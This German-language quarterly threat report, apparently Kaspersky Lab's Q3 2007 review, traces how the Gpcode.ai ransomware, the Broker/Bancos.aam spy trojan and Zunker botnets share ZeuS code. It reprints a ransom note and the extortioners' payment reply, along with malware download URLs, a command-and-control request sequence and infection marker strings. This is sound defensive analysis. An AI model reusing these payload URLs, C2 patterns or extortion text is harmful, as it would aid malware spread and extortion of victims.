Malware-Bedrohungen im dritten Quartal 2007

Dieser Quartalsbericht ist äußerst ungewöhnlich. Er beschäftigt sich ausschließlich mit den Ergebnissen einer einzigen großen Untersuchung und umfasst dabei sämtliche interessanten Viren-Ereignisse der letzten drei Monate. Zudem zeigt er, worin die Arbeit eines Virenanalysten besteht.

Verglichen mit globalen Viren-Epidemien vom Kailber eines Mydoom oder Lovesan wirken heutige Malware-Programme reichlich einfallslos. Auf den ersten Blick produzieren deren Urheber nämlich nichts anderes als einen endlosen Strom einförmiger trojanischer Programme. Dafür gibt es jedoch eine simple Erklärung. Cyberkriminelle vermeiden es mittlerweile, jegliche Aufmerksamkeit auf sich zu ziehen, da Berichte über Virusepidemien unweigerlich das Interesse der Behörden wecken. Malware-Programmierer haben deshalb das Motto „je leiser und unauffälliger, desto besser“ zum obersten Arbeitsprinzip erkoren. Technische Neuerungen auf ihrem Gebiet sind aber in der Tat selten geworden, weil Hackergruppen sich schon lange auf eingespielte Mechanismen und Strukturen verlassen. Die Öffentlichkeit nimmt davon normalerweise nur dann Notiz, wenn die Virenprogrammierer unvorsichtig werden. Dabei erweist sich oftmals die Kombination aus Geldgier und geringem technischen Know-how als verräterisch.

Schadprogramme und Virenautoren waren auch im dritten Quartal 2007 sehr aktiv, haben insgesamt aber weniger Sicherheitsvorfälle verursacht als noch vor einigen Monaten. Dennoch gab es zahlreiche Diebstähle von Anwenderdaten. Zudem erschien auch ein neuer Erpresser-Trojaner auf der Bildfläche. Auch die Hysterie um das Russian Business Network (RBN), das in der Berichterstatttung prompt als Virenschleuder gebrandmarkt wurde, blieb im Gedächtnis haften. Zeitgleich veröffentlichte Meldungen über rasant wachsende Botnetze mit dem Wurm Zhelatin als bekanntestem Vertreter erregten dagegen kaum Aufsehen. Und das, obwohl dieser Schädling zwischenzeitlich mehr als zwei Millionen Computer infiziert hatte.

Während viele der virentechnisch interessantesten Ereignisse in den Massenmedien gar nicht erwähnt wurden, hat sie Kaspersky Lab sämtlich analysiert. Obwohl einige dieser Vorfälle nichts miteinander zu tun zu haben schienen, konnten die Antiviren-Experten erstaunliche Gemeinsamkeiten aufdecken.

Die Rückkehr der Verschlüsselungs-Trojaner

Verschlüsselungs-Trojaner waren länger als ein Jahr von der Bildfläche verschwunden. Zuvor hatte der Schädling Gpcode sämtliche Antiviren-Hersteller auf Trab gehalten, indem er Anwenderdaten mittels RSA-Algorithmus verschlüsselte. Nach damaligen Schätzungen von Kaspersky Lab sollten derartige Schadprogramme auch künftig wieder kursieren. Genau das trat rund ein Jahr später ein. Etwa um den 13. Juli 2007 entdeckten Anwender, dass sich zahlreiche auf ihrem Rechner gespeicherte Dateien nicht mehr öffnen ließen und nur noch aus „Zahlensalat“ bestanden. Zudem fanden sie auf ihren Systemen ein von ihnen nicht angelegtes File namens read_me.txt, dessen Inhalt wie folgt lautet:

Hello, your files are encrypted with RSA-4096 algorithm
(http://en.wikipedia.org/wiki/RSA).
You will need at least few years to decrypt these files without our
software. All your private information for last 3 months were
collected and sent to us.
To decrypt your files you need to buy our software. The price is $300.
To buy our software please contact us at: xxxxxxx@xxxxx.com and provide us
your personal code -XXXXXXXXX. After successful purchase we will send
your decrypting tool, and your private information will be deleted
from our system.
If you will not contact us until 07/15/2007 your private information
will be shared and you will lost all your data.
Glamorous team

Die im Text genannte E-Mail-Adresse war Kaspersky Lab bereits aus verschiedenen Varianten der russischen Trojaner LdPinch und Banker bekannt. Entgegen der Textangaben kam jedoch nicht der RSA-Algorithmus, sondern ein modifizierter RC4-Chiffre zum Einsatz. Dieser ließ sich innerhalb eines Tages entschlüsseln und so schnell den Antiviren-Datenbanken hinzufügen.

Die Analyse der neuen Gpcode-Version Gpcode.ai(analysis?pubid=189040157) ergab zudem, dass die Malware nicht nur Daten verschlüsselt, sondern auch in der Lage ist, Anwenderdaten von infizierten Computern zu stehlen. In diesem Fall landen die Files auf einem Server der Virenschreiber, der befallene Rechner mit weiteren Schädlingen verseuchen kann. Angesichts der Gefahr, die von diesem Trojaner ausging, befasste sich Kaspersky Lab eingehender mit dessen Funktionsweise. Wie sich herausstellen sollte, war das ein durchaus weiser Entschluss.

Auf den Spuren von Gpcode.ai

Bei der Analyse von Gpcode.ai konzentrierte sich Kaspersky Labs auf drei Indizien:

  • den Server, mit welchem der Trojaner Daten austauschte (http://martin-golf.net)
  • die von den Hackern im Textfile read_me.txt angegebenen E-Mail-Adressen
  • den im Trojaner-Body enthaltenen String _SYSTEM_64AD0625_, mit der Gpcode seine Anwesenheit im Arbeitsspeicher markiert.

Die Server-Fährte

Wie sich herausstellte, kommunizierte Gpcode.ai mit dem Server über das dort abgelegte Skript s.php. Von dieser Adresse bezog der Schädling auch die Datei cfg.bin, die ihn instruiert, welche Informationen auf infizierten Rechnern gesammelt werden sollen. Dabei hatten die Hacker es vor allem auf Zugangsdaten für Online-Banking- und -Bezahlsysteme abgesehen.

Nicht nur Kaspersky Lab hat sich ausführlich mit Gpcode beschäftigt. Auch zahlreiche andere Antiviren-Unternehmen führten ihre Analysen durch. Beispielsweise fanden die Kollegen von PrevX auf dem Server der Cyberkriminellen Dateien von 494 infizierten Rechnern und schlugen prompt Alarm. Zu den Opfern zählten auch einige Großunternehmen, deren Namen der PrevX-CEO Mel Morris teilweise bekannt gab: die Luftfahrtgesellschaft American Airlines, der Strategie- und Technologieberater Booz Allen Hamilton und sogar das Außenministerium der USA. Allerdings gab keines der von Morris genannten Unternehmen einen Kommentar ab.

Branchenkenner waren von der PrevX-Aktion alles andere als begeistert. David Parry, der CIO von Trend Micro, stufte das das Vorgehen als ethisch fragwürdig ein. Seine Argumentation: Während andere Antiviren-Hersteller Server- und E-Mail-Adressen von Cyberkriminellen ausschließlich intern verwenden, macht PrevX sie publik und offenbart so jedermann, wo die privaten Daten liegen und wem sie gehören. Kurz nachdem PrevX den Servernamen im Klartext nannte, setzte ein regelrechter Ansturm auf martin-golf.net ein und machte weitere Untersuchungen damit hinfällig. Durch die sprunghaft gestiegenen Zugriffszahlen blieb den Cyberkriminellen nicht verborgen, dass nun ein bunt gemischtes Volk aus IT-Sicherheitsexperten, Hackern und neugierigen Usern ihren Server beobachtete. Nun konnten sich die Ermittler bestenfalls nur noch gegenseitig observieren. Kaspersky Lab verlegte sich daher auf Punkt zwei, die im Textfile read_me.txt angegebenen E-Mail-Adressen.

Kontaktaufnahme per E-Mail

Wie läuft die Kommunikation zwischen den Cyberkriminellen und Anwendern ab, die sich entschließen, Geld zum entschlüsseln ihrer Daten zu bezahlen? Um das herauszufinden, sendeten die Antiviren-Experten folgende E-Mail an die im Text angegebene Adresse:

„Mein Name ist John Brown. Ich bin ein einfacher Angestellter und meine Daten wurden verschlüsselt. Ich brauche sie dringend für einen Bericht. Wenn ich diesen nicht abliefere, entlässt mich mein Boss.“

Bereits am nächsten Tag lag eine Antwort im Postfach:

Sorry for delay.

Please transfer $500 to e-gold account 4616329 and send us a e-mail to
address oxyglamour@gmail.com. You can buy e-gold with paypal with help of
exchange site listed on official e-gold site (http://www.e- gold.com/unsecure/links.htm#marketmaker).

After that, we will send your personal decoding program immediately

Mit ihren Forderungen nahmen es die Programmierer des Trojaners offensichtlich nicht so genau. Anstelle der im Gpcode-Text geforderten 300 US-Dollar verlangten sie nun 500 US-Dollar. Zum Geldtransfer sollte das anonyme Micropayment-System e-gold genutzt werden. Damit verliefen die Ermittlungen auch in dieser Richtung ergebnislos.

„SYSTEM_64AD0625_“ als letzter Anhaltspunkt

Nachdem die Ursachenforschung mit Server- und E-Mail-Adresse erfolglos blieb, versuchte Kaspersky Lab herauszufinden, welche anderen Schadprogramme von der Gruppe stammten, die sich selbst Glamorous team nennt. Daher begannen die Experten, ihre umfangreiche Virenkollektion nach der Zeile _SYSTEM_64AD0625_ zu durchforsten. Das Ergebnis war mehr als überraschend. Der String tauchte in den unterschiedlichsten trojanischen Schadprogrammen auf, zu denen beispielsweise die Klassen Trojan-Downloader, Trojan-Spys und Backdoors gehören.

Die Stichproben hatten neben dem String _SYSTEM_64AD0625_ jedoch noch mehr Gemeinsamkeiten. Alle gefundenen Schädlinge verankern sich ebenso wie Gpcode.ai unter dem Dateinamen ntos.exe im System. Außerdem enthalten diese Schadprogramme die Dateien sporder.dll und rsvp322.dll und erstellen im Windows-Systemverzeichnis den Ordner wsnpoem. In diesen platzieren sie mit audio.dll und video.dll zwei weitere Files. Eine genauere Analyse einiger Schädlinge ergab schließlich, dass sie nicht nur die gleiche Identifikations-Zeile enthalten, sondern auch zu mehr als 80 Prozent im Programmcode übereinstimmen.

Der Trojaner mit „Universalcode“

Die Antiviren-Experten waren damit auf eine Art „Universalcode“ gestoßen, der sich vielseitig einsetzen ließ. Seine Funktionen eignen sich unter anderem für Datendiebstahl und zum Malware-Download auf bereits infizierte Rechner. Mit dem Universalcode ausgestattete Programme können aber auch als Bots fungieren und infizierte Computer an Zombie-Netze anschließen. Auf dessen Basis entwickelte Malware wurde von Kaspersky Lab bereits Ende 2006 entdeckt. Der Universalcode wurde auch zur Entwicklung des Verschlüsselungs-Trojaners Gpcode.ai verwendet. Ausgehend von diesen Entdeckungen weitete sich die Analyse nun auf die Systemeinträge und deren Abhängigkeiten aus.

Schlechte Gesellschaft: Trojaner und Hilfsprogramme

Im nächsten Schritt analysierte Kaspersky Lab die im Universalcode enthaltenen Links am Beispiel einer aktuellen Malware-Version. In dessen Quellcode tauchen die folgenden vier Verweise auf, welche das Schadprogramm bei seinen Aktivitäten verwendet:

http://81.95.149.28/logo/zeus.exe
http://81.95.149.28/logo/zupa.exe
http://myscreensavers.info/zupa.exe
http:/81.95.149.28/logo/fout.php

Wie genau geht dieser Trojaner vor?

Zuerst installiert sich die Malware als ntos.exe im System und bezieht die Dateien zeus.exe (http://81.95.149.28/logo/zeus.exe) und zupa.exe (http://81.95.149.28/logo/zupa.exe). Anschließend meldet sich der Trojaner über das Skript fout.php (http:/81.95.149.28/logo/fout.php) beim Botnetz an. Dort empfängt der Trojaner die verschlüsselte Konfigurationsdatei cfg.bin, die neben Textmitteilungen auch Links auf andere Webseiten enthält. Derart konfiguriert überwacht das Schadprogramm nun sämtliche Netzaktivitäten des Anwenders. Sobald dieser in Foren, Gästebüchern oder Blogs einen Beitrag hinterlässt, fügt der Trojaner über die Datei cfg.bin eigene Texte samt schädlichem Link (http://myscreensavers.info/zupa.exe) hinzu. Der Nutzer des infizierten Rechners bekommt die angehängten Textmeldungen allerdings nicht zu sehen – alle anderen Nutzer dagegen sehr wohl:


Beispiel für eine schädliche Mitteilung

Die Kaspersky-Experten suchten nun mit Google nach ähnlichen Textstellen und wurden reichlich fündig:

Bei einem solchen Angriffsschema verbreiten Trojaner-Autoren neue Schadprogramm-Varianten über bereits infizierte Rechner. An diesem Beispiel wird deutlich, dass Cyberkriminelle allmählich davon absehen, Schadsoftware per E-Mail zu versenden. Stattdessen gehen nutzen sie verstärkt die Mechanismen moderner Internet-Technologien.

Folgende Tabelle zeigt, welche Schadprogramme der von Kaspersky Lab untersuchte Trojaner verbreitet hat:

Auf den ersten Blick haben diese Malware-Familien nichts miteinander gemein und scheinen zudem von verschiedenen Viren-Autoren zu stammen. Dennoch verbreiteten sich alle Schadprogramme über die gleiche Webseite und mit Hilfe ein und desselben Trojan-Downloaders.

Diese Erkenntnisse laden natürlich zu Spekulationen ein. Wurden die Schädlinge von einem Malware-Syndikat in Umlauf gebracht, das auch bei allen aktuellen Schädlingen und den jüngsten Viren-Epidemien seine Finger im Spiel hat? Die Analyse eines Botnetzes, das aus Bzub-Trojanern bestand, verstärkte diesen Eindruck. Es stellte sich nämlich heraus, dass Bzub praktisch identisch mit der Malware Zupacha ist, allerdings auch als Spionage-Trojaner arbeitet. Beide Schädlinge sind Clients des Botnet-Systems Zunker. Ebenso wie Bzub und Zupacha hatte auch der E-Mail-Wurm Win32.Zhelatin.bg Zugriff auf das Zunker-Botnetz. Dieser Schädling verbreitete sich Anfang 2007 massenweise per E-Mail und bediente sich dazu raffinierter Social-Engineering-Techniken.

Wie die Recherchen ergaben, besteht zwischen Zhelatin, Warezov, Bancos.aam, Bzub und Gpcode.ai eine Verbindung. Antivirus-Spezialisten zählen sie zu den weltweit aktivsten und gefährlichsten Schädlingen und haben sie unter anderem in diesen Dateien entdeckt: ntos.exe, video.dll, audio.dll, sporder.dll, lcewza.exe, filech.exe, filede.exe, iphone.scr, ldr.exe, ldr2.exe, loader.exe, pajero.exe, update92620748.exe, zeus.exe, zs1.exe. Die Trojaner-Verbindungen lassen sich deshalb wie folgt darstellen:

Noch während der Untersuchungen machten die Cyberkriminellen erneut von sich reden. Sicherlich waren sich nicht darauf aus, ins Rampenlicht zu geraten, doch der Zeitpunkt war ungünstig gewählt.

Der Trojaner Broker als Gpcode-Variante

Am 25. Juli 2007, knapp 10 Tage nach dem Auftritt von Gpcode.ai, entdeckten die Experten von Kaspersky Lab einen neuen Schädling, der sich schnell verbreitete. Dieser zielt auf die Besucher der populären russischen Informations-Portale utro.ru, gzt.ru und rbc.ru ab. Wie sich herausstellte, verwendet die Malware ein von utro.ru generiertes Banner (http://www.txt.utro.ru/cgi- bin/banner/rian?86028&options=FN) und platziert darin einen Link auf eine schädliche Website (http://81.95.145.210/333/m00333/index.php). Diese wurde vom bereits bekannten RBN (Russian Bussiness Network) gehostet. Einen Browser, der diese Webseite aufrief, griff das dort installierte Malware-System Mpack mit zahlreichen Exploits an. Bei erfolgreicher Attacke schleicht sich ein Trojan Downloader in das System ein und installiert mit Trojan-Spy.Win32. Bancos.aam anschließend das eigentliche Schadprogramm. Dieses geht nach folgender Befehlssequenz vor:

Host: 81.95.149.66
GET /e1/file.php HTTP/1.1
GET /ldr1.exe HTTP/1.1
GET /cfg.bin HTTP/1.0
POST /s.php?1=april_002fdf3f&i= HTTP/1.0

Auf dem infizierten Rechner erschien daraufhin mit ntos.exe eine den Virenanalysten bekannte Datei – sie wurde auch bei der Installation von Gpcode.ai verwendet. Mit der Erwartung, einen neuen Verschlüsselungs-Trojaner vor sich zu haben, ging Kaspersky Lab zur Dateianalyse über. Das Ergebnis: Bancos.aam ist zwar nicht mit Gpcode identisch, aber verwendet dessen Code. Zudem ist ntos.exe der erste erfasste Spionage-Trojaner, der es auf Anwenderdaten des russischen QUIK-Systems abgesehen hat. Dabei handelt es sich um eine Plattform für Online-Börsenhandel. Die Virenanalysten sahen sich mit einer neuen Situation konfrontiert. Zwar ist der Diebstahl von Bank-Accounts weit verbreitet, eine Malware, die es auf Zugangsdaten für Online-Börsen abgesehen hat, gab es bis dato jedoch nicht.

Bancos.aam durchsucht infizierte Systeme nach den Dateien secring.txk, pubring.txk und qrypto.cfg, in denen Zugangsdaten für QUIK gespeichert sind. Wird der Trojaner fündig, nimmt er mit dem Server der Cyberkriminellen Kontakt auf. In den Malware-Archiven von Kaspersky Lab fanden sich fünf Varianten dieses Trojaners, die seit Anfang Juli im Internet kursierten. Daraufhin fassten die Virenexperten alle Varianten von Bancos.aam zur neuen Malware-Familie Trojan-PSW.Win32.Broker zusammen. Von Gpcode.ai unterschieden sie sich nur minimal und verwenden den eingangs erwähnten „Universalcode“. Während die neue Trojaner-Familie auf Datendiebstahl spezialisiert war, verschlüsselt Gpcode.ai die gestohlenen Informationen.

Zwischenergebnisse der Kaspersky-Untersuchung

Anfang August 2007 verfügte Kaspersky Lab über folgende „Universalcode“-Fakten:

  • Gpcode.ai basiert auf dem Universalcode und lässt sich auf die Webseite martin-golf.net zurückverfolgen.
  • Bancos.aam setzt ebenfalls auf den Universalcode und stammt von Servern des „Bulletproof“-Hosts RBN (Russian Business Network).
  • Auch einige bereits von Kaspersky Lab gefundene Zunker-Botnetze greifen auf RBN-Ressourcen zurück.
  • Zunker-Botnetze fungieren als Steuerungszentralen für Trojan-Downloader, die Malware mittels Bancos.aam oder einem anderen Vertreter von Gpcode beziehen.
  • Zu den Schadprogrammen, die sich mit Hilfe von Zunker-Botnetzen steuern lassen, gehören der Trojan-Downloader Zupacha, das Spionageprogrmm Bzub und vermutlich der Wurm Zhelatin, der auch als Sturmwurm bekannt ist.
  • Über eines dieser Botnetze wurde der Wurm Warezov verbreitet.

Sämtliche Abhängigkeiten lassen sich grafisch so zusammenfassen:

Nun galt es noch, den Programmierer des „Universalcodes“ zu enttarnen und herauszufinden, ob sämtliche damit erstellte Malware auf das Konto ein und derselben Hacker-Gruppe geht. Dazu blieb den Virenexperten nichts anderes übrig, als größtenteils russischsprachige Hacker-Webseiten und -Foren auf entsprechende Hinweise abzusuchen.

Auf der Suche nach dem „Universalcode“

Botnetz-Zutaten: Zunker und Zupacha

In einschlägigen Foren wurde das Botnetz-Paket aus Zunker und Zupacha für teilweise sehr hohe Geldsummen gehandelt. Während manche Anbieter bis zu 3000 US-Dollar für dieses System verlangten, bekam man es anderorts schon für 200 US-Dollar. Für Kaspersky Lab war es jedoch nicht weiter schwierig, Zunker und Zupacha zum Nulltarif zu erhalten. Weil den Virenexperten einige aktive Botnetze bekannt waren, brauchten sie lediglich zu danach zu „googlen“. Der Funktionsumfang des Malware-Pärchens ist recht eindrucksvoll. Zu dessen Hauptaufgaben zählt nicht nur der Download von Schadsoftware, sondern auch die eigene Weiterverbreitung. Dazu gehört beispielsweise das Einschleusen von Textzeilen in Forenbeiträgen. Zupacha verfügt aber noch über weitere Methoden, um sich zu verbreiten:

  • ICQ- und Jabber-Spam: Jeder IM-Nachricht fügt die Malware einen Link hinzu, der auf eine schädliche Website verweist.
  • Web-Spam: Hier wird der Link allen Formularen hinzugefügt, welche der Anwender ausfüllt. Dabei handelt es sich normalerweise um Foren- und Webmail-Eingabemasken.
  • E-Mail-Spam: Zupacha schreibt eine abschließende Textzeile in jede E-Mail des Anwenders.

Zupacha wird nicht von selbst aktiv, sondern schaltet sich nur dann ein, wenn der Anwender Mitteilungen verschickt. Dabei bekommt der User nichts von den Modifikationen mit, weil die vom Wurm angehängte Textzeile nicht angezeigt wird. Da Zupacha als Trojan-Downloader agiert, stiehlt er auch keine Daten. Aus diesem Grund kann die Malware nicht als Beispiel für den berüchtigten Universalcode dienen.

Die Kaspersky-Analyse führte aber schließlich zu einem Resultat: Der in Bancos.aam, Gpcode.ai und Broker sowie hunderter anderer Viren-Varianten verwendete Universalcode ließ sich auf das Botprogramm ZeuS zurückverfolgen.

„ZeuS“ als Urvater des Verschlüsselungs-Trojaners

Bei ZeuS handelt es sich um ein „kommerzielles“ Bot-System, das zum Verkauf angeboten und für jeden Kunden individuell konfiguriert wurde. Der Autor von ZeuS trat dabei nicht in Erscheinung, sondern ließ dies durch Dritte erledigen. Nachdem Gpcode.ai und Broker jedoch großes Aufsehen erregt hatten und Behörden auf die Vorfälle aufmerksam wurden, wollte der Programmierer anscheinend kein weiteres Risiko eingehen und beschloss daher, den Verkauf einzustellen. Seinen Entschluss verkündete er auf einer Szene-Webseite.

Ungefähre Übersetzung der Unterhaltung: Datum: 17.08.2007

„Jetzt mal konkret: ZeuS wird nicht mehr verkauft, aber der Support für die alten Kunden ist natürlich noch verfügbar. Viel Erfolg allen.“
2Max:
„Die Verkäufe interessieren mich jetzt nicht mehr. Denn:
1.sagen wir so: ich habe gelernt, damit umzugehen und maximalen Erfolg zu haben und
2. ich bin ich zu dem Schluss gekommen, dass nur Erfolglose, die Punkt 1 nicht erfüllen, ihre Wunderwerke verkaufen.“
2NeoN:
„Du brauchst mir nicht zu drohen, mich umzubringen. Bist an den Falschen geraten.
Nimm es Dir nicht zu Herzen, war nur Spaß und nicht Ernst gemeint . Viel Erfolg!“

Die ZeuS-Affäre erinnert sehr an einen anderen Vorfall: Ende 2006 wurden Kundendaten der Nordea-Bank mit dem Trojaner Nuclear Grabber gestohlen. Dieser ähnelt in seiner Funktionsweise ZeuS und stand ebenfalls für rund 3000 US-Dollar zum Verkauf. Sein Autor, ein Programmierer namens Corpse, gab einem Journalisten sogar ein Interview. Doch schließlich verkündete Corpse auf seiner Website, dass er sich zurückziehen und künftig keine Schadprogramme mehr entwickeln werde. Bei ZeuS lief alles nach einem ähnlichen Schema ab. Obwohl sich dessen Autor seit ungefähr Ende Juli 2007 angeblich ebenfalls zurückgezogen hatte, tauchte kurz darauf ein Bot-Generator auf, der sich diverser ZeuS-Funktionen bedient. Verschiedene Hackergruppen stiegen daraufhin in den Handel und die Verbreitung dieser Bots ein.

Ursprünglich war ZeuS recht simpel gestrickt und konnte lediglich einzelne Dateien auf infizierte Systeme laden. Spätere Varianten waren jedoch deutlich leistungsfähiger. Die aktuellsten Versionen können sich ebenso wie Zupacha mit Zunker-Botnetzen verbinden sowie Befehle über die Datei cfg.bin empfangen. Das ermöglicht Botnetz-Betreibern, ihre Schädlinge laufend auf neue Angriffsziele auszurichten. Kaspersky Lab hat zahlreiche dieser Konfigurations-Files entschlüsselt und darin Webadressen einiger Banken und Bezahlsysteme entdeckt.

ZeuS ist mit zahlreichen Funktionen ausgestattet. Die Malware installiert sich selbsttätig auf einem System, infiltriert laufende Prozesse, widersteht verschiedenen Antivirus-Programmen und bietet einen Http-Proxy-Server. Zudem verfügt dieser Bot über sehr effektive Methoden, um Informationen zu stehen:

  1. Der Trojaner stiehlt Zertifikate und die im Protected Storage abgelegten Anwender-Passwörter.
  2. ZeuS fängt alle über den Webbrowser gesendeten Formulardaten ab und vergleicht sie mit einer internen Liste. Auf dieser finden sich in der Regel die Namen von Banken und Bezahlsystemen. Stimmen Formulardaten und Listeneintrag überein, stiehlt ZeuS die Zugangsdaten.
  3. Tippen Anwender ihre Passwörter über eine virtuelle Tastatur ein, kann sie der Trojaner dennoch abfangen. Jedesmal, wenn eine Schaltfläche per gedrückt wird, erstellt die Malware einen Screenshot.
  4. Ruft der Anwender eine Webseite auf, die auch in der ZeuS-Liste steht, leitet der Schädling die Anfrage auf eine entsprechende Phishing-Site um oder fügt der Originalseite ein neues Feld zur Dateneingabe hinzu. Der Seiteninhalt wird also direkt auf dem Computer des Anwenders geändert, und zwar noch bevor sie der Browser ausgibt. Diese interessante Methode wurde zuvor von Nuclear Grabber eingesetzt.

    Alle ZeuS-Varianten verewigen sich auf befallenen Systemen mit dem String _SYSTEM_

    Verewigen. Beispiel-Codes lauten wie folgt:

    __SYSTEM__91C38905__
    __SYSTEM__64AD0625__
    __SYSTEM__23D80F10__
    __SYSTEM__7F4523E5__
    __SYSTEM__45A2F601__

    Damit fiel es den Virenexperten leicht, sämtliche Versionen der Malware ausfindig zu machen und zur einer eigenständigen Familie namens Zbot zusammenzufassen.

    Das Standard-Botnetz aus Zupacha, ZeuS und Zunker

    Alle ZeuS-Varianten können auf vielfältige und teilweise recht originelle Weise beliebige Informationen stehlen. Es handelt sich also tatsächlich um einen „universellen“ Code, dessen Flexibilität ihn besonders gefährlich macht. Ebenso wie auch bei Gpcode.ai lässt sich jede neue Ausgabe mit einer völlig anderen Funktionalität ausstatten. Wie beliebt der Schädling damit in der russischen Cyberkriminellen-Szene war, zeigt die Anzahl der Botnetze, die auf seiner Technik setzte. Diese basierte dabei auf der Kombination aus Zupacha und ZeuS mit Zunker als Steuerzentrale. Eines der größten Zunker-Botnetze umfasste mehr als 106 000 Rechner und wuchs täglich um mehr als 1500 Maschinen, bevor es entdeckt wurde. Die rasante Verbreitung von Zupacha resultiert auch aus seiner einfachen Konfiguration.

    Selbst ein Neuling in der Cyberkriminellen-Branche konnte die beiden Trojaner ZeuS und Zupacha käuflich erwerben und bekam sie zudem für seine Zwecke maßgeschneidert. Der Kunde musste daraufhin lediglich noch einen Server mieten, und dort mit Zunker die Botnet-Steuerzentrale installieren. Als Hosting-Plattform wählten die Käufer meist das berüchtigte Russian Business Network (RBN), das sich damit in kurzer Zeit den Ruf eines Kriminellen-Netzwerks erwarb.

    Kaspersky Lab interessierte sich weniger für das RBN als vielmehr für seine Kunden und die Botnetze, die sie verwendeten. Mit absoluter Sicherheit wurden über einige der Zunker-Botnetze gefährliche Schädlinge wie Zhelatin und Warezov verbreitet. Dabei bleibt unklar, ob ihre Programmierer die Botnetze auch selbst geschaffen oder sich bereits existierender Plattformen bedient haben.

    Als der Trojaner Zupacha westlichen Hackern in die Hände fiel, waren diese von seinem Konzept beeindruckt. Daraufhin starteten sie in Foren wie www.ryan1918.com eine öffentliche Diskussion über dessen Funktionsweise. Die Hacker fanden beispielsweise heraus, wie sich die Adresse in der Bannerdatei des Trojaners ändert lässt. So konnten sie den Schädling zu ihren Zwecken einsetzen, ohne seinen Quellcode zu kennen. Sie versuchten zudem, eine eigene Steuerungszentrale einschließlich einer Konfigurationsdatenbank zu entwickeln und kamen schon recht bald hinter die Funktionsweise des Trojaners. Alle an dieser Analyse beteiligten Personen trugen wesentlich zu Entwicklung und Verbreitung von Zupacha bei und erhöhten dessen Bekanntheitsgrad.

    Fazit

    Alle in diesem Bericht zusammengefassten Informationen zeigen, wie die zumeist russischsprachigen Cyberkriminellen arbeiten. Während diese Trojaner entwickeln und verkaufen, passen Kunden die erworbenen Programme mehr oder weniger umfangreich ihren eigenen Anforderungen an. Infizierte Rechner werden in Botnetze eingereiht, die zum Teil mehrere hunderttausend Computer umfassen können. Solche Netze werden von zentraler Stelle aus gesteuert und lassen sich zur Verbreitung unterschiedlicher und häufig sogar miteinander konkurrierender Schadprogramme nutzen. Damit diese Systeme so lange wie möglich funktionieren, betreuen sie so genannte Bullet-Proof-Hosting-Services. Für ihre Leistungen verlangen diese höchst unterschiedliche Honorare, die zwischen weniger als 100 und einigen tausend US-Dollar pro Monat rangieren.

    Weil das Geschäftsmodell Botnetz einen gewissen Gewinn verspricht, sind Angebot und Nachfrage in diesem Metier groß. Dieser Quartalsbericht beleuchtet mit den russischen Hackergruppen lediglich die Spitze des Eisbergs. Die Botnetz-Betreiber agieren weltweit und gehen trotz manch regionaler Besonderheiten nach einem ähnlichen Schema vor.

    Eine russische Nachrichtenmeldung vom 17. August 2007 (http://www.informationweek.com/news/showArticle.jhtml?articleID=201800958) soll als weiteres Beispiel für die im Quartalsbericht dargestellte Situation dienen:

    Security researchers have unearthed the single largest cache of stolen identities, thanks in part to a Trojan stealing the data that has been hidden in a fraudulent advertisement on online job sites like Monster.com.
    Don Jackson, a researcher with security company SecureWorks, told InformationWeek that he found 12 data caches connected to one group using the latest variance of the Prg Trojan, which also is known as Ntos, Tcp Trojan, Zeus, Infostealer.Monstres, and Banker.aam. Several of the 12 found caches contain information on about 4,000 to 6,000 identity theft victims, but one contains about 10,000 and the largest one contains 46,000.
    He estimates that between the 12 caches, there probably is information on about 100,000 stolen identities.

    Welcher Trojaner für diesen Vorfall verantwortlich war und auf welche Weise er die Daten stahl lässt sich unschwer erraten – natürlich einmal mehr der „Universalcode“ ZeuS. Da verwundert es auch nicht mehr, dass der Schädling seine Beute an das Russian Business Network schickte.

Ähnliche Beiträge

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.